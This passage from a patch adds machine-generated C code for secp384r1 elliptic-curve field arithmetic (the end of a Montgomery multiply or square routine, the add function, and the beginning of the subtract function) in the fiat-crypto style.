x321; ++ uint64_t x322; ++ uint64_t x323; ++ fiat_secp384r1_uint1 x324; ++ uint64_t x325; ++ fiat_secp384r1_uint1 x326; ++ uint64_t x327; ++ fiat_secp384r1_uint1 x328; ++ uint64_t x329; ++ fiat_secp384r1_uint1 x330; ++ uint64_t x331; ++ fiat_secp384r1_uint1 x332; ++ uint64_t x333; ++ fiat_secp384r1_uint1 x334; ++ uint64_t x335; ++ fiat_secp384r1_uint1 x336; ++ uint64_t x337; ++ uint64_t x338; ++ uint64_t x339; ++ uint64_t x340; ++ uint64_t x341; ++ uint64_t x342; ++ uint64_t x343; ++ uint64_t x344; ++ uint64_t x345; ++ uint64_t x346; ++ uint64_t x347; ++ uint64_t x348; ++ uint64_t x349; ++ uint64_t x350; ++ uint64_t x351; ++ fiat_secp384r1_uint1 x352; ++ uint64_t x353; ++ fiat_secp384r1_uint1 x354; ++ uint64_t x355; ++ fiat_secp384r1_uint1 x356; ++ uint64_t x357; ++ fiat_secp384r1_uint1 x358; ++ uint64_t x359; ++ fiat_secp384r1_uint1 x360; ++ uint64_t x361; ++ uint64_t x362; ++ fiat_secp384r1_uint1 x363; ++ uint64_t x364; ++ fiat_secp384r1_uint1 x365; ++ uint64_t x366; ++ fiat_secp384r1_uint1 x367; ++ uint64_t x368; ++ fiat_secp384r1_uint1 x369; ++ uint64_t x370; ++ fiat_secp384r1_uint1 x371; ++ uint64_t x372; ++ fiat_secp384r1_uint1 x373; ++ uint64_t x374; ++ fiat_secp384r1_uint1 x375; ++ uint64_t x376; ++ uint64_t x377; ++ uint64_t x378; ++ uint64_t x379; ++ uint64_t x380; ++ uint64_t x381; ++ uint64_t x382; ++ uint64_t x383; ++ uint64_t x384; ++ uint64_t x385; ++ uint64_t x386; ++ uint64_t x387; ++ uint64_t x388; ++ uint64_t x389; ++ fiat_secp384r1_uint1 x390; ++ uint64_t x391; ++ fiat_secp384r1_uint1 x392; ++ uint64_t x393; ++ fiat_secp384r1_uint1 x394; ++ uint64_t x395; ++ fiat_secp384r1_uint1 x396; ++ uint64_t x397; ++ fiat_secp384r1_uint1 x398; ++ uint64_t x399; ++ uint64_t x400; ++ fiat_secp384r1_uint1 x401; ++ uint64_t x402; ++ fiat_secp384r1_uint1 x403; ++ uint64_t x404; ++ fiat_secp384r1_uint1 x405; ++ uint64_t x406; ++ fiat_secp384r1_uint1 x407; ++ uint64_t x408; ++ fiat_secp384r1_uint1 x409; ++ uint64_t x410; ++ fiat_secp384r1_uint1 x411; ++ uint64_t x412; ++ fiat_secp384r1_uint1 x413; ++ uint64_t x414; ++ uint64_t x415; ++ uint64_t x416; ++ uint64_t x417; ++ uint64_t x418; ++ uint64_t x419; ++ uint64_t x420; ++ uint64_t x421; ++ uint64_t x422; ++ uint64_t x423; ++ uint64_t x424; ++ uint64_t x425; ++ uint64_t x426; ++ uint64_t x427; ++ uint64_t x428; ++ fiat_secp384r1_uint1 x429; ++ uint64_t x430; ++ fiat_secp384r1_uint1 x431; ++ uint64_t x432; ++ fiat_secp384r1_uint1 x433; ++ uint64_t x434; ++ fiat_secp384r1_uint1 x435; ++ uint64_t x436; ++ fiat_secp384r1_uint1 x437; ++ uint64_t x438; ++ uint64_t x439; ++ fiat_secp384r1_uint1 x440; ++ uint64_t x441; ++ fiat_secp384r1_uint1 x442; ++ uint64_t x443; ++ fiat_secp384r1_uint1 x444; ++ uint64_t x445; ++ fiat_secp384r1_uint1 x446; ++ uint64_t x447; ++ fiat_secp384r1_uint1 x448; ++ uint64_t x449; ++ fiat_secp384r1_uint1 x450; ++ uint64_t x451; ++ fiat_secp384r1_uint1 x452; ++ uint64_t x453; ++ uint64_t x454; ++ fiat_secp384r1_uint1 x455; ++ uint64_t x456; ++ fiat_secp384r1_uint1 x457; ++ uint64_t x458; ++ fiat_secp384r1_uint1 x459; ++ uint64_t x460; ++ fiat_secp384r1_uint1 x461; ++ uint64_t x462; ++ fiat_secp384r1_uint1 x463; ++ uint64_t x464; ++ fiat_secp384r1_uint1 x465; ++ uint64_t x466; ++ fiat_secp384r1_uint1 x467; ++ uint64_t x468; ++ uint64_t x469; ++ uint64_t x470; ++ uint64_t x471; ++ uint64_t x472; ++ uint64_t x473; ++ x1 = (arg1[1]); ++ x2 = (arg1[2]); ++ x3 = (arg1[3]); ++ x4 = (arg1[4]); ++ x5 = (arg1[5]); ++ x6 = (arg1[0]); ++ fiat_secp384r1_mulx_u64(&x7, &x8, x6, (arg1[5])); ++ fiat_secp384r1_mulx_u64(&x9, &x10, x6, (arg1[4])); ++ fiat_secp384r1_mulx_u64(&x11, &x12, x6, (arg1[3])); ++ fiat_secp384r1_mulx_u64(&x13, &x14, x6, (arg1[2])); ++ fiat_secp384r1_mulx_u64(&x15, &x16, x6, (arg1[1])); ++ fiat_secp384r1_mulx_u64(&x17, &x18, x6, (arg1[0])); ++ fiat_secp384r1_addcarryx_u64(&x19, &x20, 0x0, x18, x15); ++ fiat_secp384r1_addcarryx_u64(&x21, &x22, x20, x16, x13); ++ fiat_secp384r1_addcarryx_u64(&x23, &x24, x22, x14, x11); ++ fiat_secp384r1_addcarryx_u64(&x25, &x26, x24, x12, x9); ++ fiat_secp384r1_addcarryx_u64(&x27, &x28, x26, x10, x7); ++ x29 = (x28 + x8); ++ fiat_secp384r1_mulx_u64(&x30, &x31, x17, UINT64_C(0x100000001)); ++ fiat_secp384r1_mulx_u64(&x32, &x33, x30, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x34, &x35, x30, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x36, &x37, x30, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x38, &x39, x30, UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_mulx_u64(&x40, &x41, x30, UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_mulx_u64(&x42, &x43, x30, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u64(&x44, &x45, 0x0, x43, x40); ++ fiat_secp384r1_addcarryx_u64(&x46, &x47, x45, x41, x38); ++ fiat_secp384r1_addcarryx_u64(&x48, &x49, x47, x39, x36); ++ fiat_secp384r1_addcarryx_u64(&x50, &x51, x49, x37, x34); ++ fiat_secp384r1_addcarryx_u64(&x52, &x53, x51, x35, x32); ++ x54 = (x53 + x33); ++ fiat_secp384r1_addcarryx_u64(&x55, &x56, 0x0, x17, x42); ++ fiat_secp384r1_addcarryx_u64(&x57, &x58, x56, x19, x44); ++ fiat_secp384r1_addcarryx_u64(&x59, &x60, x58, x21, x46); ++ fiat_secp384r1_addcarryx_u64(&x61, &x62, x60, x23, x48); ++ fiat_secp384r1_addcarryx_u64(&x63, &x64, x62, x25, x50); ++ fiat_secp384r1_addcarryx_u64(&x65, &x66, x64, x27, x52); ++ fiat_secp384r1_addcarryx_u64(&x67, &x68, x66, x29, x54); ++ fiat_secp384r1_mulx_u64(&x69, &x70, x1, (arg1[5])); ++ fiat_secp384r1_mulx_u64(&x71, &x72, x1, (arg1[4])); ++ fiat_secp384r1_mulx_u64(&x73, &x74, x1, (arg1[3])); ++ fiat_secp384r1_mulx_u64(&x75, &x76, x1, (arg1[2])); ++ fiat_secp384r1_mulx_u64(&x77, &x78, x1, (arg1[1])); ++ fiat_secp384r1_mulx_u64(&x79, &x80, x1, (arg1[0])); ++ fiat_secp384r1_addcarryx_u64(&x81, &x82, 0x0, x80, x77); ++ fiat_secp384r1_addcarryx_u64(&x83, &x84, x82, x78, x75); ++ fiat_secp384r1_addcarryx_u64(&x85, &x86, x84, x76, x73); ++ fiat_secp384r1_addcarryx_u64(&x87, &x88, x86, x74, x71); ++ fiat_secp384r1_addcarryx_u64(&x89, &x90, x88, x72, x69); ++ x91 = (x90 + x70); ++ fiat_secp384r1_addcarryx_u64(&x92, &x93, 0x0, x57, x79); ++ fiat_secp384r1_addcarryx_u64(&x94, &x95, x93, x59, x81); ++ fiat_secp384r1_addcarryx_u64(&x96, &x97, x95, x61, x83); ++ fiat_secp384r1_addcarryx_u64(&x98, &x99, x97, x63, x85); ++ fiat_secp384r1_addcarryx_u64(&x100, &x101, x99, x65, x87); ++ fiat_secp384r1_addcarryx_u64(&x102, &x103, x101, x67, x89); ++ fiat_secp384r1_addcarryx_u64(&x104, &x105, x103, x68, x91); ++ fiat_secp384r1_mulx_u64(&x106, &x107, x92, UINT64_C(0x100000001)); ++ fiat_secp384r1_mulx_u64(&x108, &x109, x106, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x110, &x111, x106, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x112, &x113, x106, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x114, &x115, x106, UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_mulx_u64(&x116, &x117, x106, UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_mulx_u64(&x118, &x119, x106, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u64(&x120, &x121, 0x0, x119, x116); ++ fiat_secp384r1_addcarryx_u64(&x122, &x123, x121, x117, x114); ++ fiat_secp384r1_addcarryx_u64(&x124, &x125, x123, x115, x112); ++ fiat_secp384r1_addcarryx_u64(&x126, &x127, x125, x113, x110); ++ fiat_secp384r1_addcarryx_u64(&x128, &x129, x127, x111, x108); ++ x130 = (x129 + x109); ++ fiat_secp384r1_addcarryx_u64(&x131, &x132, 0x0, x92, x118); ++ fiat_secp384r1_addcarryx_u64(&x133, &x134, x132, x94, x120); ++ fiat_secp384r1_addcarryx_u64(&x135, &x136, x134, x96, x122); ++ fiat_secp384r1_addcarryx_u64(&x137, &x138, x136, x98, x124); ++ fiat_secp384r1_addcarryx_u64(&x139, &x140, x138, x100, x126); ++ fiat_secp384r1_addcarryx_u64(&x141, &x142, x140, x102, x128); ++ fiat_secp384r1_addcarryx_u64(&x143, &x144, x142, x104, x130); ++ x145 = ((uint64_t)x144 + x105); ++ fiat_secp384r1_mulx_u64(&x146, &x147, x2, (arg1[5])); ++ fiat_secp384r1_mulx_u64(&x148, &x149, x2, (arg1[4])); ++ fiat_secp384r1_mulx_u64(&x150, &x151, x2, (arg1[3])); ++ fiat_secp384r1_mulx_u64(&x152, &x153, x2, (arg1[2])); ++ fiat_secp384r1_mulx_u64(&x154, &x155, x2, (arg1[1])); ++ fiat_secp384r1_mulx_u64(&x156, &x157, x2, (arg1[0])); ++ fiat_secp384r1_addcarryx_u64(&x158, &x159, 0x0, x157, x154); ++ fiat_secp384r1_addcarryx_u64(&x160, &x161, x159, x155, x152); ++ fiat_secp384r1_addcarryx_u64(&x162, &x163, x161, x153, x150); ++ fiat_secp384r1_addcarryx_u64(&x164, &x165, x163, x151, x148); ++ fiat_secp384r1_addcarryx_u64(&x166, &x167, x165, x149, x146); ++ x168 = (x167 + x147); ++ fiat_secp384r1_addcarryx_u64(&x169, &x170, 0x0, x133, x156); ++ fiat_secp384r1_addcarryx_u64(&x171, &x172, x170, x135, x158); ++ fiat_secp384r1_addcarryx_u64(&x173, &x174, x172, x137, x160); ++ fiat_secp384r1_addcarryx_u64(&x175, &x176, x174, x139, x162); ++ fiat_secp384r1_addcarryx_u64(&x177, &x178, x176, x141, x164); ++ fiat_secp384r1_addcarryx_u64(&x179, &x180, x178, x143, x166); ++ fiat_secp384r1_addcarryx_u64(&x181, &x182, x180, x145, x168); ++ fiat_secp384r1_mulx_u64(&x183, &x184, x169, UINT64_C(0x100000001)); ++ fiat_secp384r1_mulx_u64(&x185, &x186, x183, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x187, &x188, x183, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x189, &x190, x183, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x191, &x192, x183, UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_mulx_u64(&x193, &x194, x183, UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_mulx_u64(&x195, &x196, x183, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u64(&x197, &x198, 0x0, x196, x193); ++ fiat_secp384r1_addcarryx_u64(&x199, &x200, x198, x194, x191); ++ fiat_secp384r1_addcarryx_u64(&x201, &x202, x200, x192, x189); ++ fiat_secp384r1_addcarryx_u64(&x203, &x204, x202, x190, x187); ++ fiat_secp384r1_addcarryx_u64(&x205, &x206, x204, x188, x185); ++ x207 = (x206 + x186); ++ fiat_secp384r1_addcarryx_u64(&x208, &x209, 0x0, x169, x195); ++ fiat_secp384r1_addcarryx_u64(&x210, &x211, x209, x171, x197); ++ fiat_secp384r1_addcarryx_u64(&x212, &x213, x211, x173, x199); ++ fiat_secp384r1_addcarryx_u64(&x214, &x215, x213, x175, x201); ++ fiat_secp384r1_addcarryx_u64(&x216, &x217, x215, x177, x203); ++ fiat_secp384r1_addcarryx_u64(&x218, &x219, x217, x179, x205); ++ fiat_secp384r1_addcarryx_u64(&x220, &x221, x219, x181, x207); ++ x222 = ((uint64_t)x221 + x182); ++ fiat_secp384r1_mulx_u64(&x223, &x224, x3, (arg1[5])); ++ fiat_secp384r1_mulx_u64(&x225, &x226, x3, (arg1[4])); ++ fiat_secp384r1_mulx_u64(&x227, &x228, x3, (arg1[3])); ++ fiat_secp384r1_mulx_u64(&x229, &x230, x3, (arg1[2])); ++ fiat_secp384r1_mulx_u64(&x231, &x232, x3, (arg1[1])); ++ fiat_secp384r1_mulx_u64(&x233, &x234, x3, (arg1[0])); ++ fiat_secp384r1_addcarryx_u64(&x235, &x236, 0x0, x234, x231); ++ fiat_secp384r1_addcarryx_u64(&x237, &x238, x236, x232, x229); ++ fiat_secp384r1_addcarryx_u64(&x239, &x240, x238, x230, x227); ++ fiat_secp384r1_addcarryx_u64(&x241, &x242, x240, x228, x225); ++ fiat_secp384r1_addcarryx_u64(&x243, &x244, x242, x226, x223); ++ x245 = (x244 + x224); ++ fiat_secp384r1_addcarryx_u64(&x246, &x247, 0x0, x210, x233); ++ fiat_secp384r1_addcarryx_u64(&x248, &x249, x247, x212, x235); ++ fiat_secp384r1_addcarryx_u64(&x250, &x251, x249, x214, x237); ++ fiat_secp384r1_addcarryx_u64(&x252, &x253, x251, x216, x239); ++ fiat_secp384r1_addcarryx_u64(&x254, &x255, x253, x218, x241); ++ fiat_secp384r1_addcarryx_u64(&x256, &x257, x255, x220, x243); ++ fiat_secp384r1_addcarryx_u64(&x258, &x259, x257, x222, x245); ++ fiat_secp384r1_mulx_u64(&x260, &x261, x246, UINT64_C(0x100000001)); ++ fiat_secp384r1_mulx_u64(&x262, &x263, x260, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x264, &x265, x260, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x266, &x267, x260, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x268, &x269, x260, UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_mulx_u64(&x270, &x271, x260, UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_mulx_u64(&x272, &x273, x260, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u64(&x274, &x275, 0x0, x273, x270); ++ fiat_secp384r1_addcarryx_u64(&x276, &x277, x275, x271, x268); ++ fiat_secp384r1_addcarryx_u64(&x278, &x279, x277, x269, x266); ++ fiat_secp384r1_addcarryx_u64(&x280, &x281, x279, x267, x264); ++ fiat_secp384r1_addcarryx_u64(&x282, &x283, x281, x265, x262); ++ x284 = (x283 + x263); ++ fiat_secp384r1_addcarryx_u64(&x285, &x286, 0x0, x246, x272); ++ fiat_secp384r1_addcarryx_u64(&x287, &x288, x286, x248, x274); ++ fiat_secp384r1_addcarryx_u64(&x289, &x290, x288, x250, x276); ++ fiat_secp384r1_addcarryx_u64(&x291, &x292, x290, x252, x278); ++ fiat_secp384r1_addcarryx_u64(&x293, &x294, x292, x254, x280); ++ fiat_secp384r1_addcarryx_u64(&x295, &x296, x294, x256, x282); ++ fiat_secp384r1_addcarryx_u64(&x297, &x298, x296, x258, x284); ++ x299 = ((uint64_t)x298 + x259); ++ fiat_secp384r1_mulx_u64(&x300, &x301, x4, (arg1[5])); ++ fiat_secp384r1_mulx_u64(&x302, &x303, x4, (arg1[4])); ++ fiat_secp384r1_mulx_u64(&x304, &x305, x4, (arg1[3])); ++ fiat_secp384r1_mulx_u64(&x306, &x307, x4, (arg1[2])); ++ fiat_secp384r1_mulx_u64(&x308, &x309, x4, (arg1[1])); ++ fiat_secp384r1_mulx_u64(&x310, &x311, x4, (arg1[0])); ++ fiat_secp384r1_addcarryx_u64(&x312, &x313, 0x0, x311, x308); ++ fiat_secp384r1_addcarryx_u64(&x314, &x315, x313, x309, x306); ++ fiat_secp384r1_addcarryx_u64(&x316, &x317, x315, x307, x304); ++ fiat_secp384r1_addcarryx_u64(&x318, &x319, x317, x305, x302); ++ fiat_secp384r1_addcarryx_u64(&x320, &x321, x319, x303, x300); ++ x322 = (x321 + x301); ++ fiat_secp384r1_addcarryx_u64(&x323, &x324, 0x0, x287, x310); ++ fiat_secp384r1_addcarryx_u64(&x325, &x326, x324, x289, x312); ++ fiat_secp384r1_addcarryx_u64(&x327, &x328, x326, x291, x314); ++ fiat_secp384r1_addcarryx_u64(&x329, &x330, x328, x293, x316); ++ fiat_secp384r1_addcarryx_u64(&x331, &x332, x330, x295, x318); ++ fiat_secp384r1_addcarryx_u64(&x333, &x334, x332, x297, x320); ++ fiat_secp384r1_addcarryx_u64(&x335, &x336, x334, x299, x322); ++ fiat_secp384r1_mulx_u64(&x337, &x338, x323, UINT64_C(0x100000001)); ++ fiat_secp384r1_mulx_u64(&x339, &x340, x337, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x341, &x342, x337, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x343, &x344, x337, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x345, &x346, x337, UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_mulx_u64(&x347, &x348, x337, UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_mulx_u64(&x349, &x350, x337, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u64(&x351, &x352, 0x0, x350, x347); ++ fiat_secp384r1_addcarryx_u64(&x353, &x354, x352, x348, x345); ++ fiat_secp384r1_addcarryx_u64(&x355, &x356, x354, x346, x343); ++ fiat_secp384r1_addcarryx_u64(&x357, &x358, x356, x344, x341); ++ fiat_secp384r1_addcarryx_u64(&x359, &x360, x358, x342, x339); ++ x361 = (x360 + x340); ++ fiat_secp384r1_addcarryx_u64(&x362, &x363, 0x0, x323, x349); ++ fiat_secp384r1_addcarryx_u64(&x364, &x365, x363, x325, x351); ++ fiat_secp384r1_addcarryx_u64(&x366, &x367, x365, x327, x353); ++ fiat_secp384r1_addcarryx_u64(&x368, &x369, x367, x329, x355); ++ fiat_secp384r1_addcarryx_u64(&x370, &x371, x369, x331, x357); ++ fiat_secp384r1_addcarryx_u64(&x372, &x373, x371, x333, x359); ++ fiat_secp384r1_addcarryx_u64(&x374, &x375, x373, x335, x361); ++ x376 = ((uint64_t)x375 + x336); ++ fiat_secp384r1_mulx_u64(&x377, &x378, x5, (arg1[5])); ++ fiat_secp384r1_mulx_u64(&x379, &x380, x5, (arg1[4])); ++ fiat_secp384r1_mulx_u64(&x381, &x382, x5, (arg1[3])); ++ fiat_secp384r1_mulx_u64(&x383, &x384, x5, (arg1[2])); ++ fiat_secp384r1_mulx_u64(&x385, &x386, x5, (arg1[1])); ++ fiat_secp384r1_mulx_u64(&x387, &x388, x5, (arg1[0])); ++ fiat_secp384r1_addcarryx_u64(&x389, &x390, 0x0, x388, x385); ++ fiat_secp384r1_addcarryx_u64(&x391, &x392, x390, x386, x383); ++ fiat_secp384r1_addcarryx_u64(&x393, &x394, x392, x384, x381); ++ fiat_secp384r1_addcarryx_u64(&x395, &x396, x394, x382, x379); ++ fiat_secp384r1_addcarryx_u64(&x397, &x398, x396, x380, x377); ++ x399 = (x398 + x378); ++ fiat_secp384r1_addcarryx_u64(&x400, &x401, 0x0, x364, x387); ++ fiat_secp384r1_addcarryx_u64(&x402, &x403, x401, x366, x389); ++ fiat_secp384r1_addcarryx_u64(&x404, &x405, x403, x368, x391); ++ fiat_secp384r1_addcarryx_u64(&x406, &x407, x405, x370, x393); ++ fiat_secp384r1_addcarryx_u64(&x408, &x409, x407, x372, x395); ++ fiat_secp384r1_addcarryx_u64(&x410, &x411, x409, x374, x397); ++ fiat_secp384r1_addcarryx_u64(&x412, &x413, x411, x376, x399); ++ fiat_secp384r1_mulx_u64(&x414, &x415, x400, UINT64_C(0x100000001)); ++ fiat_secp384r1_mulx_u64(&x416, &x417, x414, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x418, &x419, x414, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x420, &x421, x414, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x422, &x423, x414, UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_mulx_u64(&x424, &x425, x414, UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_mulx_u64(&x426, &x427, x414, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u64(&x428, &x429, 0x0, x427, x424); ++ fiat_secp384r1_addcarryx_u64(&x430, &x431, x429, x425, x422); ++ fiat_secp384r1_addcarryx_u64(&x432, &x433, x431, x423, x420); ++ fiat_secp384r1_addcarryx_u64(&x434, &x435, x433, x421, x418); ++ fiat_secp384r1_addcarryx_u64(&x436, &x437, x435, x419, x416); ++ x438 = (x437 + x417); ++ fiat_secp384r1_addcarryx_u64(&x439, &x440, 0x0, x400, x426); ++ fiat_secp384r1_addcarryx_u64(&x441, &x442, x440, x402, x428); ++ fiat_secp384r1_addcarryx_u64(&x443, &x444, x442, x404, x430); ++ fiat_secp384r1_addcarryx_u64(&x445, &x446, x444, x406, x432); ++ fiat_secp384r1_addcarryx_u64(&x447, &x448, x446, x408, x434); ++ fiat_secp384r1_addcarryx_u64(&x449, &x450, x448, x410, x436); ++ fiat_secp384r1_addcarryx_u64(&x451, &x452, x450, x412, x438); ++ x453 = ((uint64_t)x452 + x413); ++ fiat_secp384r1_subborrowx_u64(&x454, &x455, 0x0, x441, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u64(&x456, &x457, x455, x443, ++ UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_subborrowx_u64(&x458, &x459, x457, x445, ++ UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_subborrowx_u64(&x460, &x461, x459, x447, ++ UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_subborrowx_u64(&x462, &x463, x461, x449, ++ UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_subborrowx_u64(&x464, &x465, x463, x451, ++ UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_subborrowx_u64(&x466, &x467, x465, x453, 0x0); ++ fiat_secp384r1_cmovznz_u64(&x468, x467, x454, x441); ++ fiat_secp384r1_cmovznz_u64(&x469, x467, x456, x443); ++ fiat_secp384r1_cmovznz_u64(&x470, x467, x458, x445); ++ fiat_secp384r1_cmovznz_u64(&x471, x467, x460, x447); ++ fiat_secp384r1_cmovznz_u64(&x472, x467, x462, x449); ++ fiat_secp384r1_cmovznz_u64(&x473, x467, x464, x451); ++ out1[0] = x468; ++ out1[1] = x469; ++ out1[2] = x470; ++ out1[3] = x471; ++ out1[4] = x472; ++ out1[5] = x473; ++} ++ ++/* ++ * The function fiat_secp384r1_add adds two field elements in the Montgomery domain. ++ * Preconditions: ++ * 0 ≤ eval arg1 < m ++ * 0 ≤ eval arg2 < m ++ * Postconditions: ++ * eval (from_montgomery out1) mod m = (eval (from_montgomery arg1) + eval (from_montgomery arg2)) mod m ++ * 0 ≤ eval out1 < m ++ * ++ * Input Bounds: ++ * arg1: [[0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff]] ++ * arg2: [[0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff]] ++ * Output Bounds: ++ * out1: [[0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff]] ++ */ ++static void ++fiat_secp384r1_add(uint64_t out1[6], const uint64_t arg1[6], ++ const uint64_t arg2[6]) ++{ ++ uint64_t x1; ++ fiat_secp384r1_uint1 x2; ++ uint64_t x3; ++ fiat_secp384r1_uint1 x4; ++ uint64_t x5; ++ fiat_secp384r1_uint1 x6; ++ uint64_t x7; ++ fiat_secp384r1_uint1 x8; ++ uint64_t x9; ++ fiat_secp384r1_uint1 x10; ++ uint64_t x11; ++ fiat_secp384r1_uint1 x12; ++ uint64_t x13; ++ fiat_secp384r1_uint1 x14; ++ uint64_t x15; ++ fiat_secp384r1_uint1 x16; ++ uint64_t x17; ++ fiat_secp384r1_uint1 x18; ++ uint64_t x19; ++ fiat_secp384r1_uint1 x20; ++ uint64_t x21; ++ fiat_secp384r1_uint1 x22; ++ uint64_t x23; ++ fiat_secp384r1_uint1 x24; ++ uint64_t x25; ++ fiat_secp384r1_uint1 x26; ++ uint64_t x27; ++ uint64_t x28; ++ uint64_t x29; ++ uint64_t x30; ++ uint64_t x31; ++ uint64_t x32; ++ fiat_secp384r1_addcarryx_u64(&x1, &x2, 0x0, (arg1[0]), (arg2[0])); ++ fiat_secp384r1_addcarryx_u64(&x3, &x4, x2, (arg1[1]), (arg2[1])); ++ fiat_secp384r1_addcarryx_u64(&x5, &x6, x4, (arg1[2]), (arg2[2])); ++ fiat_secp384r1_addcarryx_u64(&x7, &x8, x6, (arg1[3]), (arg2[3])); ++ fiat_secp384r1_addcarryx_u64(&x9, &x10, x8, (arg1[4]), (arg2[4])); ++ fiat_secp384r1_addcarryx_u64(&x11, &x12, x10, (arg1[5]), (arg2[5])); ++ fiat_secp384r1_subborrowx_u64(&x13, &x14, 0x0, x1, UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u64(&x15, &x16, x14, x3, ++ UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_subborrowx_u64(&x17, &x18, x16, x5, ++ UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_subborrowx_u64(&x19, &x20, x18, x7, ++ UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_subborrowx_u64(&x21, &x22, x20, x9, ++ UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_subborrowx_u64(&x23, &x24, x22, x11, ++ UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_subborrowx_u64(&x25, &x26, x24, x12, 0x0); ++ fiat_secp384r1_cmovznz_u64(&x27, x26, x13, x1); ++ fiat_secp384r1_cmovznz_u64(&x28, x26, x15, x3); ++ fiat_secp384r1_cmovznz_u64(&x29, x26, x17, x5); ++ fiat_secp384r1_cmovznz_u64(&x30, x26, x19, x7); ++ fiat_secp384r1_cmovznz_u64(&x31, x26, x21, x9); ++ fiat_secp384r1_cmovznz_u64(&x32, x26, x23, x11); ++ out1[0] = x27; ++ out1[1] = x28; ++ out1[2] = x29; ++ out1[3] = x30; ++ out1[4] = x31; ++ out1[5] = x32; ++} ++ ++/* ++ * The function fiat_secp384r1_sub subtracts two field elements in the Montgomery domain. ++ * Preconditions: ++ * 0 ≤ eval arg1 < m ++ * 0 ≤ eval arg2 < m ++ * Postconditions: ++ * eval (from_montgomery out1) mod m = (eval (from_montgomery arg1) - eval (from_montgomery arg2)) mod m ++ * 0 ≤ eval out1 < m ++ * ++ * Input Bounds: ++ * arg1: [[0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff]] ++ * arg2: [[0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff]] ++ * Output Bounds: ++ * out1: [[0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff]] ++ */ ++static void ++fiat_secp384r1_sub(uint64_t out1[6], const uint64_t arg1[6], ++ const uint64_t arg2[6]) ++{ ++ uint64_t x1; ++ fiat_secp384r1_uint1 x2; ++ uint64_t x3; ++ fiat_secp384r1_uint1 x4; ++ uint64_t x5; ++ fiat_secp384r1_uint1 x6; ++ uint64_t x7; ++ fiat_secp384r1_uint1 x8; ++ uint64_t x9; ++ fiat_secp384r1_uint1 x10; ++ uint64_t x11; ++ fiat_secp384r1_uint1 x12; ++ uint64_t x13; ++ uint64_t x14; ++ fiat_secp384r1_uint1 x15; ++ uint64_t x16; ++ 